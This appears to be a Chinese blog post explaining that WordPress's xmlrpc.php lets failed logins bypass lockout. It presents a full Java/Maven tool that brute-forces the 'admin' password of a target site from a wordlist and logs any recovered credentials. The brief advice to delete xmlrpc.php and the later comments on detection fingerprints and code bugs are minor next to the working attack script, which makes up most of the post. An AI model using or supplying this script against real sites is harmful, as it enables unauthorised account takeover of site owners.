Wordpress xmlrpc.php暴力破解漏洞


Wordpress xmlrpc.php暴力破解漏洞

wordpress是很流行的開源部落格,它提供遠程發布文章的方法,就是使用根路徑的xmlrpc.php這個檔案,最近爆出xmlrpc漏洞,漏洞原理是通過xmlrpc進行認證,即使認證失敗,也不會被Wordpress安裝的安全外掛程式記錄,所以不會觸發密碼輸錯N次被鎖定的情況。因此就可能被暴力破解,如果密碼又是弱口令的話,就相當危險了。最簡單的解決辦法,就是刪除xmlrpc.php這個檔案,不過這樣也會一併停用它所提供的遠程發布功能。閑來無事,用java寫了暴力破解的指令碼,其實就是拿著各種使用者名稱、密碼去不斷調用xmlrpc.php這個檔案,檢測認證結果,很簡單。只為娛樂,暴力破解的事情,大家謹慎。

Xmlrpc.java源碼如下:

    package com.yeetrack.security.wordpress;

    import org.apache.http.client.ClientProtocolException;
    import org.apache.http.client.config.RequestConfig;
    import org.apache.http.client.methods.CloseableHttpResponse;
    import org.apache.http.client.methods.HttpGet;
    import org.apache.http.client.methods.HttpPost;
    import org.apache.http.entity.StringEntity;
    import org.apache.http.impl.client.CloseableHttpClient;
    import org.apache.http.impl.client.HttpClients;
    import org.apache.http.util.EntityUtils;
    import org.slf4j.Logger;
    import org.slf4j.LoggerFactory;
    import org.testng.annotations.Test;
    import java.io.*;

    /**
     * Created by victor wang on 2014/8/2.
     * Uses the WordPress xmlrpc authentication weakness to brute-force a password.
     *
     * From a detection standpoint: every attempt is a single HTTP POST to /xmlrpc.php
     * carrying a {@code wp.getUsersBlogs} call, sent with the fixed Firefox 31 User-Agent
     * below and with no delay between attempts (the sleep in {@link #test()} is commented
     * out). A web-server log or WAF rule keyed on that method name and request rate sees
     * the whole run. Note that the whole workflow lives in a TestNG {@code @Test} method,
     * so running the test suite sends network traffic.
     */
    public class Xmlrpc
    {
        // Static User-Agent sent on every request; a constant UA is itself a fingerprint.
        private String userAgent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0";
        // 4 s connect / socket / connection-request timeouts applied to every request.
        RequestConfig requestConfig = RequestConfig.custom().setConnectionRequestTimeout(4000).setConnectTimeout(4000)
                .setSocketTimeout(4000).build();
        private static Logger logger = LoggerFactory.getLogger(Xmlrpc.class);
        // One shared client for both the probe GET and the login POSTs; never closed.
        private CloseableHttpClient httpClient = HttpClients.custom()
                .setUserAgent(userAgent)
                .setDefaultRequestConfig(requestConfig)
                .build();

        /**
         * Checks whether the domain exposes the xmlrpc.php file.
         *
         * Issues a plain GET to {@code http://<host>/xmlrpc.php} and looks for the
         * "POST requests only" text in the body. This proves only that the endpoint
         * is reachable; it says nothing about whether failed logins are logged or
         * rate-limited there, so the caller's "no vulnerability" message is really
         * "no endpoint".
         *
         * @param domain host name or URL; it is normalised by {@link #wrapperUrl(String)}
         * @return {@code true} if the marker text is present in the GET response
         */
        private boolean checkXmlRpcFile(String domain)
        {
            domain = wrapperUrl(domain);
            if(domain==null)
                return false;
            HttpGet get = new HttpGet("http://"+domain+"/xmlrpc.php");
            get.addHeader("User-Agent", userAgent);
            CloseableHttpResponse response = null;
            String resultString = null;
            try {
                response = httpClient.execute(get);
                // A CloseableHttpResponse can never equal "" — the second test is dead.
                if(null == response || response.equals(""))
                    return false;
                resultString = EntityUtils.toString(response.getEntity());
            } catch (IOException e) {
                e.printStackTrace();
            }
            // If the GET threw, resultString is still null here and this dereference throws.
            return resultString.contains("XML-RPC server accepts POST requests only.");
        }

        /**
         * Single brute-force attempt.
         *
         * Sends one {@code wp.getUsersBlogs} XML-RPC call with the candidate credentials.
         * The username and password are concatenated straight into the XML body with no
         * escaping, so values containing {@code <}, {@code &} or similar produce malformed
         * XML and are reported as failures. Success is inferred solely from the literal
         * {@code isAdmin} appearing somewhere in the response body.
         *
         * @param username account name to try
         * @param password candidate password
         * @param url      host or URL of the target; normalised by {@link #wrapperUrl(String)}
         * @return {@code true} on the first response that contains {@code isAdmin}
         */
        private boolean forceLogin(String username, String password, String url)
        {
            //attempt the login
            HttpPost post = new HttpPost("http://"+wrapperUrl(url)+"/xmlrpc.php");
            post.addHeader("User-Agent", userAgent);
            String xmlString = "<?xml version=\"1.0\" encoding=\"iso-8859-1\"?><methodCall>  <methodName>wp.getUsersBlogs</methodName>  <params>   <param><value>"+username+"</value></param>   <param><value>"+password+"</value></param>  </params></methodCall>";
            StringEntity entity = null;
            try {
                entity = new StringEntity(xmlString);
                post.setEntity(entity);
                // Response is never closed; with a single shared client this can
                // exhaust the connection pool over a long run.
                CloseableHttpResponse response = httpClient.execute(post);
                String loginResult = EntityUtils.toString(response.getEntity());
                if(null== loginResult || loginResult.equals(""))
                    return false;
                if(loginResult.contains("isAdmin")) {
                    // The recovered password is written to the log in clear text.
                    logger.info(url + "登入成功,userename--->" + username + "  password--->" + password);
                    return true;
                }
            } catch (UnsupportedEncodingException e) {
                e.printStackTrace();
            } catch (ClientProtocolException e) {
                e.printStackTrace();
            } catch (IOException e) {
                e.printStackTrace();
            }
            return false;
        }

        /**
         * Sanitises a URL: strips a leading {@code http://} and everything from the
         * first {@code /} onward, leaving only the host part.
         *
         * Only {@code http://} is recognised; an {@code https://} input keeps its scheme
         * and is then cut at its first {@code /}, collapsing to the string {@code https:}.
         *
         * @param url host name or URL
         * @return the host part, or {@code null} for a {@code null} or empty input
         */
        private String wrapperUrl(String url)
        {
            if(null == url || url.equals(""))
                return null;
            if(url.startsWith("http://"))
                url = url.substring(7);
            if(url.contains("/"))
                url = url.substring(0, url.indexOf("/"));
            return url;
        }

        /**
         * Runs the crack: probes the endpoint, then reads the wordlist one line at a
         * time, trying each line as the password for the fixed username {@code admin}
         * and stopping at the first success.
         *
         * The readers are never closed, every line is echoed to stdout, and the
         * catch-all swallows everything including a missing wordlist file, so a bad
         * path shows up only as a stack trace.
         */
        @Test
        public void test()
        {
            String url = "http://somewordpress.com/xmlrpc.php";
            if(!checkXmlRpcFile(url)) {
                logger.info(url+"--->不存在xmlrpc漏洞");
                return;
            }
            File file = new File("src/main/resources/1pass00.txt"); //password dictionary, one candidate per line
            try {
                // FileReader uses the platform default charset; non-ASCII entries may be mis-decoded.
                FileReader fileReader = new FileReader(file);
                BufferedReader bufferedReader = new BufferedReader(fileReader);
                String line = null;
                int count = 1;
                while ((line = bufferedReader.readLine()) != null) {
                    System.out.println("" + count + "  " + line);
                    if(forceLogin("admin", line, url))
                        break;
                    count++;
                    //Thread.sleep(500);
                }
            } catch (Exception e) { e.printStackTrace(); }
        }
    }

項目使用maven管理,使用了apache的httpclient和log4j,pom.xml代碼如下:

    <?xml version="1.0" encoding="UTF-8"?>    <project xmlns="http://maven.apache.org/POM/4.0.0"             xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"             xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">        <modelVersion>4.0.0</modelVersion>        <groupId>com.yeetrack.security</groupId>        <artifactId>wordpress-xmlrpc</artifactId>        <version>1.0-SNAPSHOT</version>
